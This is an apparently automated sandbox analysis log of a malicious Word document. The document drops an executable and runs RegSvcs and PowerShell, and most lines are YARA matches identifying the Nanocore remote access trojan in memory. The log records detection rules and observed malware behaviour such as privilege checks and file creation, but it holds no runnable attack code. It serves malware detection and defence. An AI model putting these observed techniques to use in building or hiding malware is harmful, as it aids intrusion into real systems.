      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.382be55.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.267d0b8.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.2689300.16.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 9.2.RegSvcs.exe.381fc21.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690772132.0000000000AB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690866803.0000000000B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692471982.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692715551.0000000004600000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690835974.0000000000B50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690874360.0000000000B80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690920754.0000000000D90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692864773.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690619684.0000000000590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.692555556.00000000039B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692736182.0000000004610000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690909965.0000000000D80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690678018.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.690754072.0000000000A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000009.00000002.692788892.0000000004850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 00000009.00000002.691799150.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE indicator has summary info: false
      Source: plugmanzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: plugmancdht5461.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: ZdNnwVcb.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$C_MDR0307_019.docJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@20/21@14/2
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.2.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.2.RegSvcs.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
      Source: 9.0.RegSvcs.exe.400000.1.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP ServiceJump to behavior
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: title field not present or empty
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: author field not present or empty
      Source: ~WRF{6F85BCFE-F7E6-4D70-8C81-5E2AC6A32603}.tmp.0.drOLE document summary: edited time not present or 0
      Source: DOC_MDR0307_019.docReversingLabs: Detection: 23%
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............T.......h...............................0.......#.......................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............T.......h...............................0.......#.......8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............T.......h...............................0......./.......................H.1.............Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............T.......h...............................0......./.......8...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............T.......h.......7.......................0.......;...............|.......H.1.............Jump to behavior
